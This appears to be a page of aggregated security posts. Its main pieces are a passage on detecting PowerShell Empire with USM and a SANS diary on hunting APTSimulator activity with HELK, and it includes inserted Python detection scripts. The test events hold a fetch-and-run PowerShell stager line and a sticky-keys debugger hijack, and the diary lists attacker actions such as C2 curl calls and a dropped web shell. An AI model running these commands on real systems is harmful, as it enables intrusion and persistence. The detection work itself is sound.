To steal system credentials, an attacker can also rely on Empire modules. The mimikatz module can operate once a high-privilege agent is installed on the victim’s machine. Executing mimikatz involves an iterative file listing process that is easy to detect with USM; the alert ‘Credential Access - Powershell script executing mimikatz’ shows the command and other interesting data. Empire also uses registry keys for persistence. Some interesting registry locations to monitor with USM are SOFTWARE\Microsoft\Windows\CurrentVersion\Run and SOFTWARE\Microsoft\Windows\CurrentVersion\Debug.

Thanks to Chris Doman for collaboration.

Appendix
Host detection
Empire is detected as it is installed and executed on a machine by the following detections:
  • Malware Infection - Windows Defender Malware Detected
  • Defense Evasion - Obfuscated Command - Powershell Execution of Encoded Command
  • Code Execution - Suspicious Process Created by mshta.exe
  • Privilege Escalation - Windows UAC Bypass
  • Hacking Tool - Powershell Empire agent CnC Activity
  • Credential Access - Powershell script executing mimikatz
  • Security Critical Event - Windows Scheduled Job Created
Network detection
Empire is detected as it communicates over the network by the following network detections:
  • ETPRO TROJAN Observed PS Empire Downloader SSL Cert via MalDoc Oct 20
  • ETPRO TROJAN PowerShell Empire Request HTTP Pattern
  • ETPRO TROJAN PowerShell Empire Response HTTP Pattern
  • ETPRO TROJAN PowerShell Empire Malicious SSL Certificate Detected
  • ETPRO TROJAN PowerShell Empire SSL Cert
  • ETPRO TROJAN Receiving Possible PowerShell Empire Stager
  • ETPRO CURRENT_EVENTS PowerShell Empire Session via MSOffice Doc Macro
  • ETPRO CURRENT_EVENTS PowerShell Empire Session Initial Activity
  • ETPRO CURRENT_EVENTS PowerShell Empire Session via Excel Macro
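As an added example (not AlienVault's code and not part of the original post), the following Python script applies the detection ideas described above to a handful of constructed process-creation and registry events: it decodes a PowerShell -EncodedCommand argument (Base64 of the UTF-16LE command, not UTF-8, a frequent mistake in home-grown detections), looks for the invariant Empire launcher features in the decoded text, flags PowerShell spawned by mshta.exe, and flags writes to the mscfile\shell\open\command key. The event field names, the threshold of two launcher features for the C&C alert, and the sample events (192.0.2.10 is a documentation address) are assumptions for illustration.

```python
import base64
import re

# Alert names as the post lists them.
ALERT_ENCODED = "Defense Evasion - Obfuscated Command - Powershell Execution of Encoded Command"
ALERT_MSHTA = "Code Execution - Suspicious Process Created by mshta.exe"
ALERT_UAC = "Privilege Escalation - Windows UAC Bypass"
ALERT_CNC = "Hacking Tool - Powershell Empire agent CnC activity"

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen in stagers. The argument is Base64 of the UTF-16LE command text.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Structural features of Empire's launcher that survive case switching because
# we compare in lower case. Requiring two of them is an assumption of this example.
EMPIRE_FEATURES = ("net.webclient", "downloadstring", "downloaddata",
                   "frombase64string", "iex", "headers.add(")
UAC_KEY = "hkcu\\software\\classes\\mscfile\\shell\\open\\command"


def encode_command(ps):
    """Build the -EncodedCommand argument exactly as a stager would."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded PowerShell payload of an -EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def empire_features(decoded):
    """Launcher features present in the decoded command, case-insensitively."""
    text = decoded.lower()
    return [f for f in EMPIRE_FEATURES if f in text]


def analyse_event(ev):
    """Return the alert names this one event would raise (empty if benign)."""
    alerts = []
    if ev.get("type") == "registry":
        # Any write under the mscfile handler key is the Event Viewer UAC bypass.
        if ev.get("target", "").lower().startswith(UAC_KEY):
            alerts.append(ALERT_UAC)
        return alerts
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    if image.endswith("\\powershell.exe"):
        decoded = decode_encoded_command(ev.get("cmdline", ""))
        if decoded is not None:
            alerts.append(ALERT_ENCODED)
            if len(empire_features(decoded)) >= 2:
                alerts.append(ALERT_CNC)
        if parent.endswith("\\mshta.exe"):
            alerts.append(ALERT_MSHTA)
    return alerts


def analyse_all(events):
    return [analyse_event(ev) for ev in events]


# Constructed events, not real telemetry.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
STAGER_PS = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/launcher')"
EVENTS = [
    {"image": PS, "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "powershell -NoP -NonI -W Hidden -Enc " + encode_command(STAGER_PS)},
    {"image": PS, "parent": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": 'powershell -w hidden -nop -c "$x=1"'},
    {"type": "registry", "image": PS,
     "target": "HKCU\\Software\\Classes\\mscfile\\shell\\open\\command",
     "details": "C:\\Users\\bob\\AppData\\Local\\Temp\\evil.exe"},
    {"image": PS, "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "powershell.exe -Command Get-ChildItem C:\\Users"},
]

if __name__ == "__main__":
    for ev, alerts in zip(EVENTS, analyse_all(EVENTS)):
        print(ev.get("cmdline") or ev.get("target"), "->", alerts or "no alert")
```

The first event fires both the encoded-command alert and, because the decoded text carries three launcher features, the C&C alert; the mshta-spawned PowerShell fires only the mshta alert; the benign Get-ChildItem invocation fires nothing. In production the decoded text should also be fed to whatever script-block logging you collect, since a stager can avoid -EncodedCommand entirely by piping the script through stdin.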
Categories: Security Posts

Pattern Welding Explained as Wearable Art

Niels Provos - Tue, 2018/08/28 - 06:37

Pattern-Welding was used throughout the Viking-age to imbue swords with intricate patterns that were associated with mystical qualities. This visualization shows the pattern progression in a twisted road with increasing removal of material. It took me two years of intermittent work to get to this image. I liked this image so much that I ordered it for myself as a t-shirt and am looking forward for people asking me what the image is all about. If you want to get a t-shirt yourself, you can order this design via RedBubble. If you end up ordering a t-shirt, let me know if it ends up getting you into any interesting conversations!

Categories: Security Posts

An Elaborate Hack Shows How Much Damage IoT Bugs Can Do

Wired: Security - Mon, 2018/04/16 - 19:00
Rube-Goldbergesque IoT hacks are surprisingly simple to pull off—and can do a ton of damage.
Categories: Security Posts

How Russian Facebook Ads Divided and Targeted US Voters Before the 2016 Election

Wired: Security - Mon, 2018/04/16 - 15:00
New research shows just how prevalent political advertising was from suspicious groups in 2016—including Russian trolls.
Categories: Security Posts

Infocon: green

SANS Internet Storm Center, InfoCON: green - Fri, 2018/04/06 - 17:46
ISC Stormcast For Friday, April 6th 2018 https://isc.sans.edu/podcastdetail.html?id=5943
Categories: Security Posts

ISC Stormcast For Friday, April 6th 2018 https://isc.sans.edu/podcastdetail.html?id=5943, (Fri, Apr 6th)

SANS Internet Storm Center, InfoCON: green - Fri, 2018/04/06 - 03:30
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Threat Hunting & Adversary Emulation: The HELK vs APTSimulator - Part 1, (Thu, Apr 5th)

SANS Internet Storm Center, InfoCON: green - Thu, 2018/04/05 - 19:26

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our theme. I'm having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, is worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. This...is...Death Battle! Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not to undervalue these two offerings.
HELK is incredibly easy to install. It's also well documented, with lots of related reading material; let me propose that you take the time to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review installation steps.
On an Ubuntu 16.04 LTS system I ran:
git clone https://github.com/Cyb3rWard0g/HELK.git
cd HELK/
sudo ./helk_install.sh 
Of the three installation options I was presented with (pulling the latest HELK Docker image from cyb3rward0g's Docker Hub, building the HELK image from a local Dockerfile, or installing HELK from a local bash script), I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you: if you haven't installed Docker, the HELK install script does it for you. You can observe the entire install process in Figure 1.
Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case http://192.168.248.29.
For my test Windows system I created a Windows 7 x86 virtual machine with VirtualBox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under Kafka output, where you need to add the IP address for your HELK server in three spots. My modification appeared as hosts: ["192.168.248.29:9092","192.168.248.29:9093","192.168.248.29:9094"]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
./winlogbeat -c winlogbeat.yml -e
./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml.  This will ensure rich data returns from Sysmon, when using adversary emulation services from APTsimulator, as we will, or experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.
Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOCs response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities, if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection, it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  • Creating typical attacker working directory C:\TMP...
  • Activating guest user account
    • Adding the guest user to the local administrators group
  • Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  • Modifying the hosts file
    • Adding update.microsoft.com mapping to private IP address
  • Using curl to access well-known C2 addresses
    • C2: msupdater.com
  • Dropping a Powershell netcat alternative into the APT dir
  • Executing nbtscan on the local network
  • Dropping a modified PsExec into the APT dir
  • Registering mimikatz in At job
  • Registering a malicious RUN key
  • Registering mimikatz in scheduled task
  • Registering cmd.exe as debugger for sethc.exe
  • Dropping web shell in new WWW directory
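As an added example that is not part of this diary, HELK or APTSimulator, here is a small Python hunt over constructed Sysmon-style events for three of the artifacts above: svchost.exe placed outside System32, the hosts-file redirect of update.microsoft.com to a private address, and cmd.exe registered as the debugger for sethc.exe. The event fields are assumptions, and the hosts-file text is attached to the FileCreate event for the example only (Sysmon records file creation, not contents); in HELK you would express the same conditions as Kibana queries against the sysmon-* index.

```python
import ipaddress

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
IFEO_KEY = ("hklm\\software\\microsoft\\windows nt\\currentversion\\"
            "image file execution options\\")
# Binaries reachable from the logon screen; a Debugger value on any of them
# yields a SYSTEM shell before authentication (the classic sticky-keys trick).
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", "magnify.exe")


def masquerading_svchost(image):
    """svchost.exe legitimately runs only from System32 or SysWOW64."""
    img = image.lower()
    return img.endswith("\\svchost.exe") and not img.startswith(SYSTEM_DIRS)


def ifeo_debugger_hijack(target, debugger):
    """True when an IFEO Debugger value is set on an accessibility binary."""
    t = target.lower()
    if not debugger or not (t.startswith(IFEO_KEY) and t.endswith("\\debugger")):
        return False
    binary = t[len(IFEO_KEY):].split("\\")[0]
    return binary in ACCESSIBILITY_BINARIES


def hosts_hijacks(hosts_text):
    """Return (hostname, ip) pairs that point microsoft.com names at private space."""
    found = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                              # not a hosts entry
        for name in parts[1:]:
            if name.lower().endswith("microsoft.com") and ip.is_private:
                found.append((name.lower(), str(ip)))
    return found


def hunt(events):
    """Walk Sysmon-style events (IDs 1, 11, 13) and return (index, finding) pairs."""
    findings = []
    for i, ev in enumerate(events):
        if ev["id"] == 1 and masquerading_svchost(ev["image"]):
            findings.append((i, "svchost.exe outside System32"))
        elif ev["id"] == 13 and ifeo_debugger_hijack(ev["target"], ev.get("details", "")):
            findings.append((i, "IFEO debugger on accessibility binary"))
        elif ev["id"] == 11 and ev["target"].lower().endswith("\\drivers\\etc\\hosts"):
            for name, ip in hosts_hijacks(ev.get("content", "")):
                findings.append((i, "hosts maps %s to %s" % (name, ip)))
    return findings


# Constructed events, not real telemetry. "content" is attached for the example
# only; Sysmon's FileCreate event (ID 11) does not carry file contents.
EVENTS = [
    {"id": 1, "image": "C:\\Users\\Public\\svchost.exe"},
    {"id": 1, "image": "C:\\Windows\\System32\\svchost.exe"},
    {"id": 13, "target": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
                         "Image File Execution Options\\sethc.exe\\Debugger",
     "details": "C:\\Windows\\System32\\cmd.exe"},
    {"id": 11, "target": "C:\\Windows\\System32\\drivers\\etc\\hosts",
     "content": "# constructed\n127.0.0.1 localhost\n10.0.0.5 update.microsoft.com\n"},
]

if __name__ == "__main__":
    for index, finding in hunt(EVENTS):
        print(index, finding)
```

The path check deliberately matches on the image path rather than the process name alone, because APTSimulator's fake svchost.exe is a renamed srvany.exe and only its location gives it away; the IFEO check is written against the key prefix so it also catches the other accessibility binaries that the same trick abuses.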
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop in the correct version of 7-Zip for your system architecture. I'm assuming the default binaries are 64-bit; I was testing on a 32-bit VM. Let's do a fast run-through with HELK's Kibana Discover option looking for the above mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above, see for yourself in Figure 3.
Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.
Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.
Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline, process.name, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.
Figure 6: tasks OR schtasks
I think you get the point, there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, use it to your advantage (Figure 7).
Figure 7: Timelion
Finally, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you can quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM and LOCAL SERVICE. Not good enough to be particularly useful, so I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 of those were specific to cmd.exe processes, or 18.6% (Figure 8).
Figure 8: Powerful visualization capabilities
I am thrilled with both HELK and APTSimulator. The true principles of blue team and detection quality are innate in these projects. The fact that Roberto considers HELK still in alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advanced Solutions as well, there's more than one way to emulate an adversary.
Part 2 will explore HELK integration with Spark, Graphframes & Jupyter notebooks.
Russ McRee | @holisticinfosec (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts
